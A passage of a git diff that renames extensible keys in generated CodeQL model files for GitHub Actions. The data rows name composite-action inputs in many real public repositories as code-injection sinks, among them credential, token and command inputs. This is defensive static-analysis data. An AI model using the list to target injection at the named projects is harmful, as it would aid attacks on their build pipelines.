["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 5e0e5158390..631457c813e 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index bb4b41a0592..44d9eb10a0d 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index ef3a84762db..0d7f80698f5 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 425242bf220..84caa043484 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 62f1ed005ed..f6aed253a21 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 098b460bbd8..1eac49617f2 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index d5a257be220..1efa6815c28 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 53c6258551f..91463a305dd 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 62a4f2bbcd7..7ef240ad999 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 6dffbff40d3..db953acf5bc 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index ac72bb9ebf0..7c1b01e14b5 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index b3f1ca67eef..37b67a933a3 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 44f5ad66096..570a9bdd142 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index c2e56f7e175..8c1993c47ca 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index 54d0c8b2fe0..ee0adaadb3e 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index b1914e7a96b..c127f03bb66 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index dd66f206ee9..3b3d60fadd0 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 0c26f02e6d8..4dd43acd2c5 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 2ee13115d6d..cb4bff25f9a 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index c76ed5b6604..39a204389b9 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 0bdf2087b46..6b4192c0c61 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index bb83a5964e7..63c3fc89058 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index f29c52b1bf5..72772ae47cf 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43745006f8d..43cc1e0187e 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 9289afb744f..7c80b7e6eda 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9729f966813..1f7b69e6254 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 92c25953944..7879a7903b4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index c572c11ada4..dbbd4c720ca 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index 1819f4f716e..f99698b1992 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index 620100dd2d9..a98a135d6b4 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index dfb08d26058..3ebb5e7acb3 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index a99ccc9e477..b26aa6ea48b 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 3a1e7b9d336..683965e13d2 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index c15c1fac006..9358c895f3c 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index b0c787fa378..8233e506603 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 86278889fdf..2aea730db7e 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 4bf92a25123..b03d2391882 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 79c13504fab..9db70f02db4 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 45ac61c8ef9..8cea15ac9e1 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index ce546fceb4b..766ec515551 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index b34c6d46da3..13ee2f4e7a8 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index f87e0c02529..0cf05c2273b 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 88348f05cd0..7f2622feecd 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 76fe3bed472..3aa8c3bc649 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index bf1a498d7a0..b79317db9c8 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index b985d87f7e1..843e0d20b98 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 8e7cdd0308c..2a0fd3ac371 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index cf30d0d19cc..3ef29cc9b84 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 5414a755179..71d2012eb02 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml 